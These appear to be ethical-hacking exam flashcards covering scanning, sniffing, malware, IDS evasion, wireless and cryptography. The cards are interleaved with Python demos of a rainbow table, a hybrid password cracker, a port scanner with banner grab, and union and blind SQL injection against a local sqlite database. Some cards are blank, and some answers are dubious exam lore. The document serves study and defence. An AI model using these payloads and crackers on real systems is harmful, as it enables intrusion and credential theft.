-
TCP 445
SMB (filesharing)
-
-
-
-
Discovered UDP 69 is open
TFTP: no authentication at all, so the risk is unauthorized uploads and downloads (device configs, boot images)
-
Wireshark display filter for traffic to a given destination port
tcp.dstport == <port>
-
-
chntpw
Offline NT password editor: boot the machine from CD/USB and blank or reset a local account (e.g. admin) password stored in the SAM
-
-
-
Metasploit Pass-the-hash
Set the SMBPass option to the LM:NTLM hash instead of a cleartext password (e.g. in exploit/windows/smb/psexec)
-
Crypto time-memory trade-off
Rainbow Table: precomputed hash chains stored on disk so that each later lookup costs far less CPU than brute force
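A toy rainbow table, added here as an illustration (it is not from the original notes). It assumes a 3-lowercase-letter password space, an unsalted truncated SHA-256 as the hash under attack, and a handful of short chains; the reduction function and chain parameters are made up for the demonstration. Note the position-dependent reduction functions, which are what separate a rainbow table from plain Hellman chains.

```python
"""Toy rainbow table: time/memory trade-off for inverting an unsalted hash.
Added example; password space, hash and parameters are assumptions."""
import hashlib

ALPHABET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 3
SPACE = len(ALPHABET) ** PW_LEN   # 17576 candidate passwords (assumption)
CHAIN_LEN = 40                    # hash/reduce steps per chain (assumption)


def H(pw: str) -> str:
    """The unsalted hash being attacked (SHA-256 truncated for readability)."""
    return hashlib.sha256(pw.encode()).hexdigest()[:16]


def R(i: int, digest: str) -> str:
    """Reduction function number i: maps a digest back into the password space.
    Each chain position uses a different R, so chains that collide at
    different positions do not merge (the 'rainbow' idea)."""
    n = (int(digest, 16) + i) % SPACE
    out = []
    for _ in range(PW_LEN):
        n, r = divmod(n, len(ALPHABET))
        out.append(ALPHABET[r])
    return "".join(out)


def build_table(starts):
    """Precomputation: store only endpoint -> start for each chain."""
    table = {}
    for start in starts:
        pw = start
        for i in range(CHAIN_LEN):
            pw = R(i, H(pw))
        table[pw] = start
    return table


def chain_point(start: str, idx: int) -> str:
    """Password sitting at position idx of the chain that begins at start."""
    pw = start
    for i in range(idx):
        pw = R(i, H(pw))
    return pw


def lookup(table, target: str):
    """Online phase: for each possible chain position of the target, walk to
    the endpoint; if that endpoint is stored, regenerate the chain and
    return the preimage. False alarms are handled by the final H() check."""
    for pos in range(CHAIN_LEN - 1, -1, -1):
        pw = R(pos, target)
        for i in range(pos + 1, CHAIN_LEN):
            pw = R(i, H(pw))
        start = table.get(pw)
        if start is None:
            continue
        pw = start
        for i in range(CHAIN_LEN):
            if H(pw) == target:
                return pw
            pw = R(i, H(pw))
    return None


if __name__ == "__main__":
    t = build_table(["cat", "dog", "key", "pwn"])
    print(lookup(t, H(chain_point("dog", 7))))
```

With only four chains the table covers at most 160 of 17576 passwords; a real table trades far more precomputation and disk for near-complete coverage, and salting defeats it entirely because the salt has to be part of the precomputed input.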
-
Microsoft Management Console snap-in for Computer Management (services, event logs, local users)
compmgmt.msc
-
Dimitri
Used for EXIF data
-
USBDumper
Silently copies the contents of any USB drive plugged into the host (USB attack tool)
-
Resolve IP from name
host -t a <domain>
-
-
nslookup setting to query name server (NS) records
set type=ns
-
-
-
-
-
CVSS metrics intrinsic to the vulnerability itself (do not change over time)
Base
-
CVSS metrics describing the current threat (exploit maturity, remediation level); change over time
Temporal
-
Fuzzer
Feeds malformed, random or sequential input to a program or web app in hopes of crashing it or exposing a flaw
-
Linux tool used for analyzing/parsing text and directory listings with regex to look for important words
grep
-
Tools for ripping passwords
- Cain & Abel
- John the Ripper
-
-
Hybrid Password Attack
Using a list of words and appending/prepending various characters to them to test as passwords
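A hybrid attack in code, added as an example that is not part of the original notes. The wordlist, the prefix/suffix mangling rules and the target hashes are all constructed for the demonstration, and unsalted SHA-256 stands in for whatever hash format a real dump would use.

```python
"""Hybrid password attack: dictionary words with characters appended/prepended.
Added example; wordlist, rules and targets are constructed."""
import hashlib
import itertools

WORDLIST = ["summer", "password", "welcome", "dragon"]          # constructed
SUFFIXES = [""] + [str(n) for n in range(100)] + ["!", "!!", "2023", "2024"]
PREFIXES = ["", "!", "1"]


def sha256_hex(s: str) -> str:
    """Stand-in for the target hash format (assumption: unsalted SHA-256)."""
    return hashlib.sha256(s.encode()).hexdigest()


def hybrid_candidates(words):
    """Yield each word in three case variants with every prefix/suffix
    combination applied. The empty prefix/suffix come first, so the plain
    dictionary guesses are tried before the mangled ones."""
    for word in words:
        for variant in (word, word.capitalize(), word.upper()):
            for pre, suf in itertools.product(PREFIXES, SUFFIXES):
                yield pre + variant + suf


def crack(target_hashes, words=WORDLIST):
    """Return {hash: plaintext} for every target hash recovered.
    All targets are checked in one pass, since hashing is the expensive step."""
    remaining = set(target_hashes)
    found = {}
    for cand in hybrid_candidates(words):
        h = sha256_hex(cand)
        if h in remaining:
            found[h] = cand
            remaining.remove(h)
            if not remaining:
                break
    return found


if __name__ == "__main__":
    targets = [sha256_hex("Summer2024"), sha256_hex("!dragon7")]
    print(crack(targets))
```

The candidate space here is 4 words x 3 case variants x 3 prefixes x 105 suffixes, under 4000 guesses; the same rules applied to a real multi-million-word list are why "Word + year" passwords fall in seconds.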
-
Snow
Uses spaces/tabs/carriage returns to hide information
-
-
-
-
KerbCrack
Password cracking tool
-
display all running services on a Windows computer
sc query (lists active services by default; `sc query state= all` includes stopped ones, and the space after `state=` is required)
-
Rootkit objectives
- Hide user/files/processes
- Replace legitimate programs/functions
-
Valid methods Linux uses to secure /etc/passwd file
Shadow passwords: the hashes are moved out of world-readable /etc/passwd into /etc/shadow, which only root can read
-
Code inside of an application file
Cavity Virus (writes itself into unused/empty regions of the host file, so the file size does not change)
-
Can infect both boot sector and exe files
Multipartite
-
Determine current bandwidth being used on a network
Sniffer
-
Best defense against ransomware
Backups
-
Putting files in a staging area and executing them in a VM (sandbox) to watch their behaviour before they are forwarded
Heuristic Analysis (dynamic/behavioural analysis)
-
Compromising a legitimate website that the target group is known to visit, so they are infected there
Watering Hole (building a convincing fake site is website spoofing/phishing, not a watering hole)
-
Software suite that is used by cybercriminals to attack/exploit victims
Blackhole exploit kit (drive-by browser/plugin exploits sold as crimeware)
-
Blackhole vs Metasploit
Both are exploit frameworks, but Blackhole is commercial crimeware built to infect victims; Metasploit is a testing framework
-
Cryptolocker
Commonly-used ransomware
-
Tool used to insert malware into good applications
Wrapper (binder): bundles a malicious payload with a legitimate program so both run when the user launches it
-
nc -l -p <port>
- netcat command
- listen on the specified port (newer OpenBSD netcat builds take just `nc -l <port>`)
-
nc <ip> <port>
- netcat command
- open a TCP connection to the ip address on the specified port and relay stdin/stdout over it
-
Requires a host program/OS to replicate, but doesn't spread from machine to machine automatically (a worm does)
Virus
-
Means of access bypassing normal authorization
- Trapdoor
- (i.e. a backdoor for when admins lock themselves out)
-
Tool used to determine which applications are using what ports
netstat (`netstat -ano` / `netstat -b` on Windows; `ss -tulpn` or `lsof -i` on Linux). nbtstat only shows NetBIOS-over-TCP/IP name tables
-
netcat -u
use UDP (instead of TCP)
-
-
netcat -w <number>
wait x seconds
-
lsof command
- list open files
- used in UNIX systems
- shows processes and what opened them
-
Wireshark returns details in
Hex
-
Tools for intercepting transmissions and injecting data into them
- Man In the Middle
- (I.e. Ettercap)
-
TCPDump
- Protocol Sniffer
- (Doesn't interact; is passive)
-
Nmap
- Network Mapper
- Discovers hosts and services on a network
-
ARP
Sends a broadcast looking for a MAC address associated with an IP address
-
Tool that can combine/manipulate multiple packet capture files
mergecap (Wireshark suite) merges captures; tcpslice cuts time ranges out of tcpdump files and can merge them; tcptrace analyses the TCP connections inside a trace
-
Port Stealing
causes switch to redirect frames intended for a server (or host) to a 3rd party
-
What level does a sniffer operate on?
Level 2 (Data Link)
-
Tool for detecting wireless networks
- Kismet
- Operates on Layer 2
- Is a net detector/sniffer/IDS
-
Kismet vs NetStumbler
- NetStumbler = Windows
- Kismet = LINUX
-
How to defend against ARP spoofing
Port Security on the switch, Dynamic ARP Inspection (DAI) where supported, and static ARP entries for critical hosts
-
Smurf Attack
- ICMP echo request with a forged source address (the victim) sent to a broadcast address; every host replies to the victim
- A reflected/amplified DoS
-
Fraggle Attack
Same idea over UDP (echo/chargen ports) instead of ICMP
-
Radioactive icon
Cain & Abel (starts APR, ARP Poison Routing)
-
ARPWALL
identifies suspicious ARP entry changes
-
Removes the need for ARP requests/replies for those hosts, so spoofed replies are ignored
Static ARP entries
-
SPAN port
Allows to monitor switch ports by copying their frames
-
-
-
tcp.flags.ack==1 && tcp.len==0
Wireshark filter for pure ACK segments (ACK flag set, no payload)
-
Using a switch and performing sniffing is considered
- ACTIVE
- (according to EC-Council)
-
Wireshark filter to display all packets whose TCP payload contains 'facebook'
tcp contains facebook (case-sensitive; use `tcp matches "(?i)facebook"` for case-insensitive)
-
Used to extract portions of a trace captured with tcpdump
tcpslice
-
This tool floods a switch with frames from random source MACs until its CAM table fills and it fails open, forwarding traffic out every port like a hub
Macof (dsniff suite)
-
PCAP is the packet capture engine used for
libpcap: tcpdump, Wireshark (via WinPcap/Npcap on Windows), Snort, Nmap
-
DNS poisoning objective
divert traffic by planting forged records in a resolver's cache
-
-
Wireshark
Sniffer & Protocol Analyzer
-
MITM attack tools
- Dsniff
- Ettercap
- Cain & Abel
-
Windows packet capture library
WinPcap (since replaced by Npcap)
-
Vishing
Phishing with VoIP or automated systems
-
E-mail based
not an official aspect of social engineering
-
SYN FLOOD is an example of
- TCP state exhaustion
- (half-open connections consume the listener's backlog/connection table)
- (a DoS attack)
-
Overlapping packets
Fragmentation Attack
-
Authentication method used by modems/frame relay/ISDN
RADIUS
-
Client-Side Session Attacks
-
CSRF
- Cross-Site Request Forgery
- Tricks the victim's browser into sending a state-changing request to a site where they are already logged in; the browser attaches the session cookie automatically
-
-
HttpOnly
- Cookie flag that blocks JavaScript (document.cookie) from reading the cookie
- Prevents XSS from stealing the session cookie (does not stop CSRF by itself; SameSite and a CSRF token do that)
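The two defences side by side, as an added example (not from the original notes): a server-side helper that emits a hardened session cookie, audits an arbitrary Set-Cookie header for missing flags, and validates a per-session CSRF token. The cookie name `sid`, the form field `csrf_token`, the `handle_state_change` function and the secret are all assumptions for the demonstration.

```python
"""Session-cookie hardening and CSRF token check (added example; names and
secret are invented for the demonstration)."""
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # would come from config in practice


def session_cookie(session_id: str) -> str:
    """Set-Cookie value for the session. HttpOnly keeps document.cookie from
    reading it, Secure keeps it off plaintext HTTP, SameSite=Strict stops the
    browser attaching it to cross-site requests (the CSRF vector)."""
    return f"sid={session_id}; HttpOnly; Secure; SameSite=Strict; Path=/"


def cookie_flags(set_cookie: str) -> dict:
    """Parse a Set-Cookie header into {name, value, flags} for auditing."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name, _, value = parts[0].partition("=")
    flags = {}
    for attr in parts[1:]:
        k, _, v = attr.partition("=")
        flags[k.lower()] = v if v else True
    return {"name": name, "value": value, "flags": flags}


def audit_cookie(set_cookie: str) -> list:
    """Return the protections missing from a session cookie, in a fixed order."""
    flags = cookie_flags(set_cookie)["flags"]
    missing = []
    if "httponly" not in flags:
        missing.append("HttpOnly")
    if "secure" not in flags:
        missing.append("Secure")
    if str(flags.get("samesite", "")).lower() not in ("strict", "lax"):
        missing.append("SameSite")
    return missing


def csrf_token(session_id: str) -> str:
    """Per-session token = HMAC(secret, session id). Goes into a hidden form
    field; an attacker's page cannot read it, so it cannot forge the POST."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id: str, submitted_token: str) -> bool:
    """Constant-time comparison; a plain == would leak timing."""
    return hmac.compare_digest(csrf_token(session_id), submitted_token)


def handle_state_change(cookies: dict, form: dict) -> str:
    """Decide whether a state-changing POST should be processed."""
    sid = cookies.get("sid")
    if sid is None:
        return "401 no session"
    if not verify_csrf(sid, form.get("csrf_token", "")):
        return "403 csrf token missing or wrong"
    return "200 ok"
```

The forged request from the second tab carries the cookie (the browser adds it) but not the token (only the legitimate page's HTML has it), so it is rejected at the token check even when the cookie is valid.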
-
TCP "session" hijacking occurs at the
- Transport Layer
- (This is an EC-Council thing)
-
Access Cards
Extensible Authentication Protocol (EAP)
-
Nmap parameter resulting in stealth
-sS
-
-sS
SYN (half-open) scan: sends SYN, reads SYN/ACK (open) or RST (closed), then answers with RST instead of completing the handshake; needs raw sockets (root)
-
Type of scan used to get through packet filters
IP Fragment
-
Nmap -Pn
- skip host discovery and port-scan every target as if it were up
- useful when ping/ICMP is filtered and the host would otherwise be skipped
-
Nmap -A
Aggressive: OS detection, version detection, default NSE scripts and traceroute (-O -sV -sC --traceroute)
-
Nmap -sV
Service/version detection (probes open ports for banners)
-
-
nmap -sT
TCP connect scan
-
-
Nmap -T0
- timing template 0, "paranoid"
- slowest and most stealthy setting (one probe at a time with long waits); -T5 "insane" is the fast, noisy end
-
Tools to validate an IDS alert prior to escalating
-
Cryptcat
- Encrypted Netcat
- Uses Twofish with a shared secret (-k), not SSL/TLS
- Reads/Writes data across a network
-
Looks at packet headers only (addresses, ports, flags; layers 3-4)
Packet Filter
-
Circuit Level Gateway
Works at the session layer (layer 5): validates the TCP handshake/session state, not the payload
-
Inspects all layers, including the application data (layer 7)
Application-Level Firewall (proxy)
-
TCP-Over-DNS
Tunnels TCP inside DNS queries/responses so it passes filters that allow DNS; looks like an ordinary DNS exchange (encryption depends on the tool)
-
Splitting the attack payload across many small TCP segments (optionally spread over time) so no single segment matches an IDS signature
Session Splicing
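Why splicing works, and what the IDS has to do about it, as an added example (not from the original notes): the segments, the signature and the minimal matcher are constructed for the demonstration and stand in for a real engine. It also shows the overlap case from the fragmentation card, where the IDS and the victim OS resolving a retransmission differently is itself an evasion.

```python
"""Session splicing vs. stream reassembly (added example; segments, signature
and matching logic are constructed)."""
import re

# Signature an IDS might carry for a path-traversal probe (constructed).
SIGNATURE = re.compile(rb"GET /\.\./\.\./etc/passwd")

# The request cut into tiny segments, tagged with TCP sequence numbers and
# delivered out of order. Constructed sample.
SPLICED_SEGMENTS = [
    (1000, b"GE"),
    (1007, b"/../e"),             # arrives before its predecessor
    (1002, b"T /.."),
    (1012, b"tc/pa"),
    (1017, b"sswd HTTP/1.0\r\n\r\n"),
]

# Overlap case: a retransmission carrying different bytes over "passwd".
OVERLAPPING_SEGMENTS = [
    (1000, b"GET /../../etc/passwd HTTP/1.0\r\n\r\n"),
    (1015, b"shadow"),
]


def match_per_segment(segments) -> bool:
    """Naive IDS: inspects each segment on its own. Splicing defeats it."""
    return any(SIGNATURE.search(payload) for _, payload in segments)


def reassemble(segments, overlap_policy="first") -> bytes:
    """Rebuild the byte stream by sequence number, in arrival order.
    'first' keeps the bytes seen first, 'last' lets a retransmission
    overwrite them; the IDS must use the policy of the host it protects."""
    stream = {}
    for seq, payload in segments:
        for off, byte in enumerate(payload):
            pos = seq + off
            if overlap_policy == "first" and pos in stream:
                continue
            stream[pos] = byte
    return bytes(stream[p] for p in sorted(stream))


def match_reassembled(segments, overlap_policy="first") -> bool:
    """IDS with stream reassembly: matches against the rebuilt stream."""
    return SIGNATURE.search(reassemble(segments, overlap_policy)) is not None


if __name__ == "__main__":
    print(match_per_segment(SPLICED_SEGMENTS), match_reassembled(SPLICED_SEGMENTS))
```

Snort's stream preprocessor does this reassembly (and takes a per-target OS policy for exactly the overlap reason); an IDS without it sees only the fragments.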
-
Tripwire
- File Integrity Checker
- also a System Integrity Verifier
-
Methods of evading an IDS
- Fragmentation
- Source Routing
- Spoofed Source Address
-
snort rule: alert tcp <src ip> <src port> -> <dst ip> <dst port>
the arrow points at the destination; the ip and port on its right side are the destination ip and port
-
Motivation for sending a TCP ACK flag
Trick device into believing there is already an established handshake
-
How can an IDS examine SSL/TLS traffic?
Use an accelerator or proxy
-
Block these to stop NetBIOS traffic
UDP 137 (name service), UDP 138 (datagram), TCP 139 (session); block TCP 445 as well to stop SMB over TCP
-
iptables
- Linux front end to netfilter that restricts inbound/outbound/forwarded packets
- Also performs stateful inspection (the conntrack/state match)
-
-
Good choices for tunneling
-
Bash Bug/Shellshock
Flaw in how Bash parses function definitions passed in environment variables (CVE-2014-6271): a remote attacker who controls an environment variable gets arbitrary command execution, and with it can read or change files and the environment
-
Basic Authentication is cleared
when the browser is closed
-
Shellshock attacks the
- CGI (the web server copies attacker-controlled HTTP headers into environment variables before invoking Bash)
- NOT an interactive command shell; the bug is in Bash's parser, the attack surface is CGI
-
Nikto
- Web server vulnerability scanner (not a general pentesting framework)
- Checks for dangerous files/CGIs, outdated server software and misconfigurations
- Has IDS evasion options that encode/obfuscate its requests
- Noisy: sends thousands of requests
-
%2e%2e
".." URL (percent) encoded; used in path traversal, e.g. %2e%2e%2f for ../
-
Nmap script for enumerating directories/files on a web server
--script=http-enum
-
Vulnerability Assessment Tools
-
Metasploit is a ____ tool
- exploitation
- NOT vulnerability assessment
-
Tools for banner grabbing
netcat, telnet, Nmap -sV, curl -I
-
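What `nc <ip> <port>`, `nc -w`, `nmap -sT` and a banner grab do on the wire, written out over plain sockets as an added example (not from the original notes) for the netcat and banner-grabbing cards. The banner service is a constructed stand-in started on 127.0.0.1 so the example runs offline; the timeouts and the fake SSH banner are arbitrary.

```python
"""TCP connect scan and banner grab over plain sockets (added example; the
loopback banner service is constructed so this runs offline)."""
import socket
import threading


def start_banner_service(banner: bytes) -> int:
    """Listen on an ephemeral loopback port (the `nc -l -p <port>` side) and
    send `banner` to every client. Returns the port; serves in a daemon thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
                with conn:
                    conn.sendall(banner)
            except OSError:
                continue            # a client that hung up early is not our problem

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def connect_scan(host: str, ports, timeout: float = 1.0) -> dict:
    """Full three-way handshake per port (nmap -sT): 'open' if connect()
    succeeds, 'closed' on RST (refused), 'filtered' if nothing comes back."""
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            results[port] = "open"
        except ConnectionRefusedError:
            results[port] = "closed"
        except socket.timeout:
            results[port] = "filtered"
        finally:
            s.close()
    return results


def grab_banner(host: str, port: int, timeout: float = 2.0) -> bytes:
    """Connect, send nothing, read whatever the service volunteers
    (`nc -w <timeout> <host> <port>`). Returns b'' if it stays silent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


def free_closed_port() -> int:
    """Find a loopback port with nothing listening, for the 'closed' case."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    p = start_banner_service(b"SSH-2.0-OpenSSH_9.6\r\n")
    print(connect_scan("127.0.0.1", [p, free_closed_port()]))
    print(grab_banner("127.0.0.1", p))
```

Because the connect scan completes the handshake, the target's application logs the connection; that is the difference from -sS, which tears down with RST before the accept() ever returns.
-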
Use metasploit as a pivot point
Meterpreter
-
Union-based SQL Injection
Appends a UNION SELECT (same column count) to the original query so rows from other tables come back in the page's normal output
-
Static Analysis
Reading source code and discerning vulnerabilities in it
-
Vulnerability Scanners that perform static analysis
-
xp_cmdshell
MS SQL Server extended stored procedure that runs OS commands on the database server (disabled by default; enabled via sp_configure)
-
'WAITFOR DELAY'
Time-based Blind SQL Injection: infer true/false from how long the response takes
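Union-based and blind injection against a string-built query, next to the parameterized form that is immune, as an added example (not from the original notes) for the union-based and blind cards above. The schema, the rows, the `lookup_user_*` functions and the secret value are constructed; sqlite3 is used so it runs offline, and since sqlite has no WAITFOR DELAY the blind case shown is boolean-based rather than time-based.

```python
"""Union-based and boolean-blind SQL injection vs. a parameterized query
(added example; schema, data and functions are constructed)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users(id INTEGER, name TEXT, email TEXT);
        CREATE TABLE secrets(id INTEGER, api_key TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice@example.test');
        INSERT INTO secrets VALUES (1, 'KEY-7f3a');
        """
    )
    return db


def lookup_user_vulnerable(db, name: str):
    """User input concatenated into SQL: the injection sink."""
    sql = f"SELECT name, email FROM users WHERE name = '{name}'"
    return db.execute(sql).fetchall()


def lookup_user_safe(db, name: str):
    """Parameterized query: the input is bound as data, never parsed as SQL."""
    return db.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()


def union_attack(db):
    """UNION SELECT with the same column count pulls another table's rows
    into the normal result set; the trailing -- comments out the leftover quote."""
    payload = "x' UNION SELECT api_key, 'x' FROM secrets --"
    return lookup_user_vulnerable(db, payload)


def blind_extract(db, length: int = 8) -> str:
    """Boolean-based blind injection: the page only shows whether a row came
    back, so extract the secret one character at a time with yes/no questions."""
    charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-abcdef"
    recovered = ""
    for i in range(1, length + 1):
        for c in charset:
            payload = (
                f"alice' AND EXISTS(SELECT 1 FROM secrets "
                f"WHERE substr(api_key,{i},1)='{c}') --"
            )
            if lookup_user_vulnerable(db, payload):
                recovered += c
                break
        else:
            break   # no character matched: end of the value
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(union_attack(db))
    print(blind_extract(db))
    print(lookup_user_safe(db, "x' UNION SELECT api_key, 'x' FROM secrets --"))
```

Time-based blind injection is the same loop with each guess wrapped in a conditional delay (WAITFOR DELAY on MSSQL, SLEEP() on MySQL) and the response time used as the oracle instead of the row count.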
-
-
-
Capture and crack 802.11 traffic protected by WEP or WPA/WPA2-PSK
Aircrack-ng suite (airodump-ng captures, aireplay-ng injects, aircrack-ng cracks)
-
Unsolicited bluetooth messages
Bluejacking
-
2007 TJ Maxx intrusion due to vulnerability in
WEP
-
Blueprinting
NOT a real BT attack
-
Kismet
- Runs on Linux
- Operates at Layer 2
- Used to discover wireless networks
-
Intercept frames needed to crack wireless protocols using
Airpcap
-
WPA2 Encryption
AES-CCMP 128-bit
-
-
Pre-Shared Key
Think of Symmetric Key
-
Problems with WEP
- Small IV (24-bit)
- Key Management
- Design Flaws
-
WEP Encryption Algorithm
RC4
-
Connecting to an AP with SSID broadcast disabled
The SSID is still sent in probe responses and association requests, so a sniffer recovers it as soon as a client connects
-
SSID also acts as kind of a
- password for the network
- (according to EC-Council)
-
Jailbreak after booting
Userland jailbreak
-
Not a risk typically associated with BYOD
CPU Overrun
-
Not a valid element of MDM
Providing secure device disposal
-
Tool used to attack blackberry phones
BBproxy
-
-
Blueborne attacks
- Exploit weakness in BT protocol
- Not specific to a particular OS or application
-
SCADA ports
- Are not agreed upon
- Scan them all
- Scan TCP & UDP
-
Rolling Code
Keyless-entry scheme on cars; attacked with jam-and-replay (RollJam), which captures a code the car never received and replays it later
-
-
-
-
LANMAN (LM hash) characteristics
- Forces all lowercase to uppercase
- Only processes first 14 characters, truncates the rest (and pads shorter passwords to 14)
- Splits the result into two 7-character halves that are hashed independently, so each half is brute-forced on its own
- No salt
-
PaaS
Provide a gen purpose OS, which is configured and managed
-
IaaS
Datacenter in the cloud
-
Hybrid Cloud
Combination of Public & Private Cloud
-
-
Factoring the product of two large primes
RSA (the hard problem its security rests on)
-
Famous attack on OpenSSL
Heartbleed
-
IPSec operates at the ___ layer
Network layer (layer 3)
-
SHA-1 message digest
160 bits
-
SHA-2 message digest
224, 256, 384 or 512 bits (SHA-224/256/384/512)
-
IPSec feature for confidentiality
ESP header
-
PGP, SSL, SSH all employ
Public Key
-
IPSec is a ___ protocol suite
VPN (tunnel mode between gateways, transport mode between hosts)
-
Creating 2 different files that have the same hash
Collision
-
This component of IPSec negotiates keys and encryption
IKE
-
Attack for decrypting data between browser and server (padding oracle)
POODLE: forces a downgrade to SSL 3.0 and exploits its CBC padding check to recover bytes such as session cookies
-
Hashing algorithms that check integrity
MD5, SHA-1, SHA-2 family (SHA-256, SHA-512); with a key, HMAC
-
Password-Cracking Tools
- John The Ripper
- KerbCrack
- Cain & Abel
-
Characteristics of PKI
- PKI facilitates distribution of trusted public keys (via certificates)
- Public key encryption is slower than symmetric, so it is used to exchange symmetric keys and to sign
- Digital Signatures use PKI
-
When users enroll in PKI, ____ verifies identity of the individual
Registration Authority
-
Best for bulk encrypting data
AES
-
Developed primarily for e-mail to provide digital signatures using asymmetric encryption
PGP
-
Passive Tools used to reveal info about a network
-
You tried to ping a site you know is up, but got nothing back
- They have ACL
- They have filtering enabled
-
____ is NOT a method of dealing with risk
Defer
-
resolving IP addresses from names (dns)
host -t a cnn.com
-
resolving DNS server names (dns)
host -t ns cnn.com
-
Proxy capable of intercepting messages, inspecting/altering them, and recording the responses (attacking web apps)
Intercepting proxy such as Burp Suite or OWASP ZAP
-
Defines who or what may be tested
Scope
-
Enumerating a Windows System
Hyena
-
Loading a script that spawns instances of itself
Application Layer Attack
-
Having two tabs open and one attacks info from the other
CSRF (the malicious tab's request rides on the session cookie the other tab established)
-
-
SQL injection attack that overlays data on your page
Union-based
-
Not a real BYOD risk
CPU Overrun
-
ICMP Type 0 Message
Echo Reply
-
Hacking Cycle:
Executing Applications -> ___________
Hiding Files
-
Nmap/Ping Suite protocols
-
User data being passed to an interpreter as code
Injection
-
Event that may result in harm or loss
Threat
-
Using Nmap: You scan and find little to no response. What now?
-sO (IP protocol scan: finds which IP protocols, e.g. ICMP/TCP/UDP, the host answers for)
-
Objective of Cross Site Scripting
Take over user identity